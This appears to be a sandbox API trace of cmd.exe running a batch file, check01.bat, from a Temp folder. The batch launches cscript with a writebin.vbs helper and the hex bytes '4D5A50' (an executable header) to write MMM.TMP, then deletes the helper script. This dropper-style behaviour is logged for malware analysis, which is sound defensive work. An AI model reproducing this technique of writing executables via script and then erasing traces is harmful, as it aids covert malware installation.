[0375.976] _wcsicmp (_String1="cscript", _String2="VER") returned -19
[0375.976] _wcsicmp (_String1="cscript", _String2="VOL") returned -19
[0375.976] _wcsicmp (_String1="cscript", _String2="EXIT") returned -2
[0375.976] _wcsicmp (_String1="cscript", _String2="SETLOCAL") returned -16
[0375.977] _wcsicmp (_String1="cscript", _String2="ENDLOCAL") returned -2
[0375.977] _wcsicmp (_String1="cscript", _String2="TITLE") returned -17
[0375.977] _wcsicmp (_String1="cscript", _String2="START") returned -16
[0375.977] _wcsicmp (_String1="cscript", _String2="DPATH") returned -1
[0375.977] _wcsicmp (_String1="cscript", _String2="KEYS") returned -8
[0375.977] _wcsicmp (_String1="cscript", _String2="MOVE") returned -10
[0375.977] _wcsicmp (_String1="cscript", _String2="PUSHD") returned -13
[0375.977] _wcsicmp (_String1="cscript", _String2="POPD") returned -13
[0375.977] _wcsicmp (_String1="cscript", _String2="ASSOC") returned 2
[0375.977] _wcsicmp (_String1="cscript", _String2="FTYPE") returned -3
[0375.977] _wcsicmp (_String1="cscript", _String2="BREAK") returned 1
[0375.977] _wcsicmp (_String1="cscript", _String2="COLOR") returned 4
[0375.977] _wcsicmp (_String1="cscript", _String2="MKLINK") returned -10
[0375.977] SetErrorMode (uMode=0x0) returned 0x0
[0375.978] SetErrorMode (uMode=0x1) returned 0x0
[0375.978] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x21e020, lpFilePart=0x1eed10 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eed10*="system32") returned 0x13
[0375.978] SetErrorMode (uMode=0x0) returned 0x1
[0375.978] GetProcessHeap () returned 0x200000
[0375.978] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21e010, Size=0x48) returned 0x21e010
[0375.978] GetProcessHeap () returned 0x200000
[0375.978] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21e010) returned 0x48
[0375.978] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0375.978] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0375.978] GetProcessHeap () returned 0x200000
[0375.978] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x21e070
[0375.979] GetProcessHeap () returned 0x200000
[0375.979] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x21e250
[0375.979] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21e250, Size=0x1d0) returned 0x21e250
[0375.979] GetProcessHeap () returned 0x200000
[0375.979] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21e250) returned 0x1d0
[0375.979] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.979] GetProcessHeap () returned 0x200000
[0375.979] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x21e430
[0375.979] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21e430, Size=0x7e) returned 0x21e430
[0375.979] GetProcessHeap () returned 0x200000
[0375.979] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21e430) returned 0x7e
[0375.979] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.*" (normalized: "c:\\windows\\system32\\cscript.*"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0x21e4c0
[0375.980] FindClose (in: hFindFile=0x21e4c0 | out: hFindFile=0x21e4c0) returned 1
[0375.980] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.COM" (normalized: "c:\\windows\\system32\\cscript.com"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0xffffffffffffffff
[0375.983] GetLastError () returned 0x2
[0375.983] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.EXE" (normalized: "c:\\windows\\system32\\cscript.exe"), fInfoLevelId=0x1, lpFindFileData=0x1eea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea80) returned 0x21e4c0
[0375.983] FindClose (in: hFindFile=0x21e4c0 | out: hFindFile=0x21e4c0) returned 1
[0375.983] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0375.983] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0375.983] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.984] SetErrorMode (uMode=0x0) returned 0x0
[0375.984] SetErrorMode (uMode=0x1) returned 0x0
[0375.984] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x218f20, lpFilePart=0x1ee560 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ee560*="system32") returned 0x13
[0375.984] SetErrorMode (uMode=0x0) returned 0x1
[0375.984] GetProcessHeap () returned 0x200000
[0375.984] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f10, Size=0x48) returned 0x218f10
[0375.984] GetProcessHeap () returned 0x200000
[0375.985] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f10) returned 0x48
[0375.985] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0375.985] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0375.985] GetProcessHeap () returned 0x200000
[0375.985] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b400
[0375.985] GetProcessHeap () returned 0x200000
[0375.985] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x218f70
[0375.985] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f70, Size=0x1d0) returned 0x218f70
[0375.985] GetProcessHeap () returned 0x200000
[0375.985] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f70) returned 0x1d0
[0375.985] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0375.985] GetProcessHeap () returned 0x200000
[0375.985] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x219150
[0375.985] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219150, Size=0x7e) returned 0x219150
[0375.985] GetProcessHeap () returned 0x200000
[0375.986] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219150) returned 0x7e
[0375.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0375.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.*" (normalized: "c:\\windows\\system32\\cscript.*"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0x21e800
[0375.986] FindClose (in: hFindFile=0x21e800 | out: hFindFile=0x21e800) returned 1
[0375.986] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.COM" (normalized: "c:\\windows\\system32\\cscript.com"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0xffffffffffffffff
[0375.987] GetLastError () returned 0x2
[0375.987] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cscript.EXE" (normalized: "c:\\windows\\system32\\cscript.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ee2d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee2d0) returned 0x21e800
[0375.987] FindClose (in: hFindFile=0x21e800 | out: hFindFile=0x21e800) returned 1
[0375.987] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0375.987] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0375.987] GetConsoleTitleW (in: lpConsoleTitle=0x1ee820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.988] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ee5d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ee598 | out: lpAttributeList=0x1ee5d8, lpSize=0x1ee598) returned 1
[0375.988] UpdateProcThreadAttribute (in: lpAttributeList=0x1ee5d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ee588, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ee5d8, lpPreviousValue=0x0) returned 1
[0375.988] GetStartupInfoW (in: lpStartupInfo=0x1ee6f0 | out: lpStartupInfo=0x1ee6f0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0375.988] lstrcmpW (lpString1="\\cscript.exe", lpString2="\\XCOPY.EXE") returned -1
[0375.988] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cscript.exe", lpCommandLine="cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ee610*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ee5c0 | out: lpCommandLine="cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\"", lpProcessInformation=0x1ee5c0*(hProcess=0x64, hThread=0x5c, dwProcessId=0xc38, dwThreadId=0xc3c)) returned 1
[0376.004] CloseHandle (hObject=0x5c) returned 1
[0376.004] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0376.004] GetProcessHeap () returned 0x200000
[0376.005] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a820 | out: hHeap=0x200000) returned 1
[0376.005] GetEnvironmentStringsW () returned 0x22a820*
[0376.005] GetProcessHeap () returned 0x200000
[0376.005] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd90
[0376.005] memcpy (in: _Dst=0x21cd90, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd90) returned 0x21cd90
[0376.005] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0376.005] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0377.186] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x1ee508 | out: lpExitCode=0x1ee508*=0x0) returned 1
[0377.186] CloseHandle (hObject=0x64) returned 1
[0377.186] _vsnwprintf (in: _Buffer=0x1ee778, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ee518 | out: _Buffer="00000000") returned 8
[0377.187] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0377.187] GetProcessHeap () returned 0x200000
[0377.187] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0377.188] GetEnvironmentStringsW () returned 0x22a820*
[0377.188] GetProcessHeap () returned 0x200000
[0377.188] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd90
[0377.188] memcpy (in: _Dst=0x21cd90, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd90) returned 0x21cd90
[0377.188] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.188] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0377.188] GetProcessHeap () returned 0x200000
[0377.188] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0377.188] GetEnvironmentStringsW () returned 0x22a820*
[0377.189] GetProcessHeap () returned 0x200000
[0377.189] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cd90
[0377.189] memcpy (in: _Dst=0x21cd90, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cd90) returned 0x21cd90
[0377.189] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0377.189] GetProcessHeap () returned 0x200000
[0377.189] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a390 | out: hHeap=0x200000) returned 1
[0377.189] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ee5d8 | out: lpAttributeList=0x1ee5d8)
[0377.189] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.189] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.190] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.190] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.191] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.191] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.192] SetConsoleInputExeNameW () returned 0x1
[0377.192] GetConsoleOutputCP () returned 0x1b5
[0377.192] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.192] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.193] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0377.193] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0377.193] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.193] SetFilePointer (in: hFile=0x64, lDistanceToMove=3094, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc16
[0377.193] GetProcessHeap () returned 0x200000
[0377.194] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219150 | out: hHeap=0x200000) returned 1
[0377.194] GetProcessHeap () returned 0x200000
[0377.194] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f70 | out: hHeap=0x200000) returned 1
[0377.194] GetProcessHeap () returned 0x200000
[0377.195] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b400 | out: hHeap=0x200000) returned 1
[0377.195] GetProcessHeap () returned 0x200000
[0377.195] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0377.195] GetProcessHeap () returned 0x200000
[0377.195] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e6e0 | out: hHeap=0x200000) returned 1
[0377.195] GetProcessHeap () returned 0x200000
[0377.195] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e4c0 | out: hHeap=0x200000) returned 1
[0377.195] GetProcessHeap () returned 0x200000
[0377.195] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e430 | out: hHeap=0x200000) returned 1
[0377.195] GetProcessHeap () returned 0x200000
[0377.196] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e250 | out: hHeap=0x200000) returned 1
[0377.196] GetProcessHeap () returned 0x200000
[0377.196] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e070 | out: hHeap=0x200000) returned 1
[0377.196] GetProcessHeap () returned 0x200000
[0377.196] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21e010 | out: hHeap=0x200000) returned 1
[0377.196] GetProcessHeap () returned 0x200000
[0377.196] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21df00 | out: hHeap=0x200000) returned 1
[0377.196] GetProcessHeap () returned 0x200000
[0377.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0377.197] GetProcessHeap () returned 0x200000
[0377.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21de40 | out: hHeap=0x200000) returned 1
[0377.197] GetProcessHeap () returned 0x200000
[0377.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21ddc0 | out: hHeap=0x200000) returned 1
[0377.197] GetProcessHeap () returned 0x200000
[0377.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0377.197] GetProcessHeap () returned 0x200000
[0377.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.198] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.198] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc16
[0377.198] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x31c, lpOverlapped=0x0) returned 1
[0377.201] SetFilePointer (in: hFile=0x64, lDistanceToMove=3125, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc35
[0377.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" del \"%temp%\\writebin.vbs\"\r\n", cbMultiByte=31, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr=" del \"%temp%\\writebin.vbs\"\r\nitebin.vbs\" \"%~1\" \"%~2\"\r\ns\"\r\n") returned 31
[0377.201] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.201] GetFileType (hFile=0x64) returned 0x1
[0377.201] _get_osfhandle (_FileHandle=3) returned 0x64
[0377.201] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc35
[0377.201] GetProcessHeap () returned 0x200000
[0377.201] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22d3d0
[0377.201] GetProcessHeap () returned 0x200000
[0377.201] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2313f0
[0377.202] GetProcessHeap () returned 0x200000
[0377.202] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b090
[0377.202] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0377.202] GetProcessHeap () returned 0x200000
[0377.202] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0377.202] GetProcessHeap () returned 0x200000
[0377.202] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2313f0 | out: hHeap=0x200000) returned 1
[0377.202] GetProcessHeap () returned 0x200000
[0377.203] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22d3d0 | out: hHeap=0x200000) returned 1
[0377.203] _tell (_FileHandle=3) returned 3125
[0377.203] _close (_FileHandle=3) returned 0
[0377.204] _wcsicmp (_String1="del", _String2="DIR") returned -4
[0377.204] _wcsicmp (_String1="del", _String2="ERASE") returned -1
[0377.204] _wcsicmp (_String1="del", _String2="DEL") returned 0
[0377.204] GetConsoleTitleW (in: lpConsoleTitle=0x1eecd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0377.205] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201890, Size=0x7a) returned 0x201890
[0377.205] GetProcessHeap () returned 0x200000
[0377.205] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201890) returned 0x7a
[0377.212] GetProcessHeap () returned 0x200000
[0377.212] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe4) returned 0x21d9d0
[0377.212] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21d9d0, Size=0x7a) returned 0x21d9d0
[0377.213] GetProcessHeap () returned 0x200000
[0377.213] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21d9d0) returned 0x7a
[0377.213] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1ee830 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0377.213] GetProcessHeap () returned 0x200000
[0377.213] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x201920
[0377.213] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1ed740 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0377.213] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ed9f8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee250, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ed9f8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0377.214] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0377.214] GetProcessHeap () returned 0x200000
[0377.214] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21da60
[0377.214] GetProcessHeap () returned 0x200000
[0377.214] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21c040
[0377.214] _wcsicmp (_String1="writebin.vbs", _String2=".") returned 73
[0377.214] _wcsicmp (_String1="writebin.vbs", _String2="..") returned 73
[0377.214] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs")) returned 0x2020
[0377.215] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x21c2c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0377.215] SetErrorMode (uMode=0x0) returned 0x0
[0377.215] SetErrorMode (uMode=0x1) returned 0x0
[0377.215] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", nBufferLength=0x104, lpBuffer=0x1ed760, lpFilePart=0x1ed750 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", lpFilePart=0x1ed750*="writebin.vbs") returned 0x31
[0377.215] SetErrorMode (uMode=0x0) returned 0x1
[0377.215] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0377.216] GetProcessHeap () returned 0x200000
[0377.216] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0377.216] _wcsicmp (_String1="writebin.vbs", _String2=".") returned 73
[0377.216] _wcsicmp (_String1="writebin.vbs", _String2="..") returned 73
[0377.216] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs")) returned 0x2020
[0377.216] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21dac0
[0377.216] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs")) returned 1
[0377.217] FindNextFileW (in: hFindFile=0x21dac0, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8094340, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8094340, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf825d3c0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x2ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="writebin.vbs", cAlternateFileName="")) returned 0
[0377.219] GetLastError () returned 0x12
[0377.219] FindClose (in: hFindFile=0x21dac0 | out: hFindFile=0x21dac0) returned 1
[0377.219] GetProcessHeap () returned 0x200000
[0377.219] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0377.219] GetProcessHeap () returned 0x200000
[0377.219] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c540 | out: hHeap=0x200000) returned 1
[0377.219] GetProcessHeap () returned 0x200000
[0377.219] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0377.219] GetProcessHeap () returned 0x200000
[0377.219] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c4d0 | out: hHeap=0x200000) returned 1
[0377.219] GetProcessHeap () returned 0x200000
[0377.220] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0377.220] GetProcessHeap () returned 0x200000
[0377.220] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c2b0 | out: hHeap=0x200000) returned 1
[0377.220] GetProcessHeap () returned 0x200000
[0377.220] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c040 | out: hHeap=0x200000) returned 1
[0377.221] GetProcessHeap () returned 0x200000
[0377.221] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21da60 | out: hHeap=0x200000) returned 1
[0377.221] GetProcessHeap () returned 0x200000
[0377.221] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201920 | out: hHeap=0x200000) returned 1
[0377.221] GetProcessHeap () returned 0x200000
[0377.221] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a10 | out: hHeap=0x200000) returned 1
[0377.221] GetProcessHeap () returned 0x200000
[0377.222] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d9d0 | out: hHeap=0x200000) returned 1
[0377.222] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.222] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0377.222] _get_osfhandle (_FileHandle=1) returned 0x7
[0377.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0377.223] _get_osfhandle (_FileHandle=0) returned 0x3
[0377.223] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0377.224] SetConsoleInputExeNameW () returned 0x1
[0377.224] GetConsoleOutputCP () returned 0x1b5
[0377.224] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0377.224] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0377.225] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
